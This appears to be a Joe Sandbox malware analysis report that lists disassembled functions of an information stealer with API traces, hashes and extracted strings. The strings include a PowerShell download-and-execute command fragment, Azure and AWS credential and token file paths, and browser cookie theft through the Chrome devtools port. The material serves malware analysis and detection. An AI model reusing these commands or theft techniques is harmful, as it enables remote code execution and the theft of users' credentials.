                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: c55a5406bfa30c88b385ddf1c2176a5d5de824efe569654957c93df452a77141
                                • Instruction ID: 14df1fc04655518a047bac81129eebfd5d41b48ab6eb942f944a1de3faf71284
                                • Opcode Fuzzy Hash: c55a5406bfa30c88b385ddf1c2176a5d5de824efe569654957c93df452a77141
                                • Instruction Fuzzy Hash: BF71FB71A40219AFDB65EBA4DC46FED7374EF48704F0444A4B719AB1C1DBB0AF488B54
                                Function 00C947E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,00C872A4), ref: 00C947E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 00C947FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00C9480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00C9481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 00C9482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00C94840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 00C94851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 00C94862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00C94873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00C94884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 00C94895
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: d4f05884d1eb883d5b8d4b27c2b81c53111f0b562d41b0e91e46ed653095589f
                                • Instruction ID: 63cca1d4fe7a4b781fa5f3257584231ca01abf7250e6347d161dd436de162de0
                                • Opcode Fuzzy Hash: d4f05884d1eb883d5b8d4b27c2b81c53111f0b562d41b0e91e46ed653095589f
                                • Instruction Fuzzy Hash: 06110071D91711FFC7109FB6AD4DA693AB8BB0F749314892AF251F2161DAF46008DB50
                                Function 00C8BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8BE53
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8BE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00C8BE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8BEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00C8BEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8BEEB
                                • lstrlen.KERNEL32(')"), ref: 00C8BEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 00C8BF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00C8BF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8BF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00C8BF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8BFBA
                                • ShellExecuteEx.SHELL32(?), ref: 00C8C00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 0c264caa175f902c9d3519b0691aadcbaa417d2ceec7c370f56302bcbba5bc54
                                • Instruction ID: 2631a739fe2c6dedb2fafe71be06bef1004b0511abbff3647363145e14923d7e
                                • Opcode Fuzzy Hash: 0c264caa175f902c9d3519b0691aadcbaa417d2ceec7c370f56302bcbba5bc54
                                • Instruction Fuzzy Hash: DE61C631A112169FCB21BFB98C896AF7BB9EF49304F058435F519E3212DB34DE059B94
                                Function 00C8ABB4 Relevance: 31.5, APIs: 25, Instructions: 296stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 00C8ABCF
                                • lstrlen.KERNEL32(0179EB88), ref: 00C8ABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8AC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8AC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ACB7
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C8ACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ACF3
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C8ACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AD28
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C8AD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AD5C
                                • lstrcat.KERNEL32(00000000,00CA4AD4), ref: 00C8AD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AD91
                                • lstrlen.KERNEL32(0179EBD0), ref: 00C8ADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8ADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8ADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8AE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8AE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8AE6F
                                • lstrlen.KERNEL32(00000000), ref: 00C8AE85
                                • lstrcpy.KERNEL32(00000000,0179EAC8), ref: 00C8AEB8
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID:
                                • API String ID: 2762123234-0
                                • Opcode ID: c8ee587daba4ce9f1a9214c1b4db0506d28b1fba1541b1c5718709974539c70c
                                • Instruction ID: fde21df34f1aa13a629f52fd3161d4bfd260011f628ff3d58a1c1fa248045e6f
                                • Opcode Fuzzy Hash: c8ee587daba4ce9f1a9214c1b4db0506d28b1fba1541b1c5718709974539c70c
                                • Instruction Fuzzy Hash: EDB18030A115169FDB21FF68CC48AAFB3B5EF45304F088426B829E7251DB34EE05DB95
                                Function 00C91820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9184F
                                • lstrlen.KERNEL32(01786EE0), ref: 00C91860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C918C1
                                • lstrlen.KERNEL32(00CA4FA0), ref: 00C918D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C918F4
                                • lstrcat.KERNEL32(00000000,00CA4FA0), ref: 00C91900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9192F
                                • lstrlen.KERNEL32(01786EF0), ref: 00C91945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C919A6
                                • lstrlen.KERNEL32(00CA4FA0), ref: 00C919B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C919D9
                                • lstrcat.KERNEL32(00000000,00CA4FA0), ref: 00C919E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91A14
                                • lstrlen.KERNEL32(01786F10), ref: 00C91A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91A8B
                                • lstrlen.KERNEL32(01786F20), ref: 00C91AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C91AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91B02
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: fdd60d3bbd4f217a86757914640297f0063fd101e9ebb32f794d812fe50a7454
                                • Instruction ID: 391d20b56e6ba2ff02c2dea388438c88aad8cb179f3b220e9c1adad7a3bdf12e
                                • Opcode Fuzzy Hash: fdd60d3bbd4f217a86757914640297f0063fd101e9ebb32f794d812fe50a7454
                                • Instruction Fuzzy Hash: F0914F706017079FDB20AFBADC8DA17B7ECEF19340B198828A996D3252DB34ED45DB50
                                Function 00C84760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C847C5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84812
                                • lstrlen.KERNEL32(00CA4B60), ref: 00C8481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8483A
                                • lstrcat.KERNEL32(00000000,00CA4B60), ref: 00C84846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C848A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C848CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 00C848DC
                                • lstrlen.KERNEL32(?), ref: 00C848F0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84931
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C849B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C849E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 26fd65333c717a32d2506c6825057656c502771d79492d52c955691409d2eb00
                                • Instruction ID: cb50628e9f81f443ada7d82bd138b890f95a8d896706a2e300524c05e8bb18e9
                                • Opcode Fuzzy Hash: 26fd65333c717a32d2506c6825057656c502771d79492d52c955691409d2eb00
                                • Instruction Fuzzy Hash: 17B1A031A112069BCB29FF79D88999F77F9EF54304F098028F85AA7212DB30ED059B94
                                Function 00C792B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C790C0: InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C790DF
                                  • Part of subcall function 00C790C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00C790FC
                                  • Part of subcall function 00C790C0: InternetCloseHandle.WININET(00000000), ref: 00C79109
                                • strlen.MSVCRT ref: 00C792E1
                                • strlen.MSVCRT ref: 00C792FA
                                  • Part of subcall function 00C78980: std::_Xinvalid_argument.LIBCPMT ref: 00C78996
                                • strlen.MSVCRT ref: 00C79399
                                • strlen.MSVCRT ref: 00C793E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00C79547
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C79559
                                • lstrcat.KERNEL32(?,?), ref: 00C7956A
                                • lstrcat.KERNEL32(?,00CA4B98), ref: 00C7957C
                                • lstrcat.KERNEL32(?,?), ref: 00C7958D
                                • lstrcat.KERNEL32(?,.txt), ref: 00C7959F
                                • lstrlen.KERNEL32(?), ref: 00C795B6
                                • lstrlen.KERNEL32(?), ref: 00C795DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C79614
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: c84621a5cd599674fef7ace562850f929ac11d7925d97e9d0d05a104ad0bfb8f
                                • Instruction ID: 59624a4c9495cee9b73fb9c76fdf70afd62511e6a0232cba112fec3ce0db0a4a
                                • Opcode Fuzzy Hash: c84621a5cd599674fef7ace562850f929ac11d7925d97e9d0d05a104ad0bfb8f
                                • Instruction Fuzzy Hash: 47E11371E10219AFDF14DFA8D885ADEBBF5EF48310F1084A9E509A7281DB70AE45DB90
                                Function 00C8D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00C8D9A1
                                • memset.MSVCRT ref: 00C8D9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8D9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8DA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8DA1C
                                • lstrcat.KERNEL32(?,0179ECF0), ref: 00C8DA36
                                • lstrcat.KERNEL32(?,?), ref: 00C8DA4A
                                • lstrcat.KERNEL32(?,0179D778), ref: 00C8DA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8DA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C8DA95
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8DAFE
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
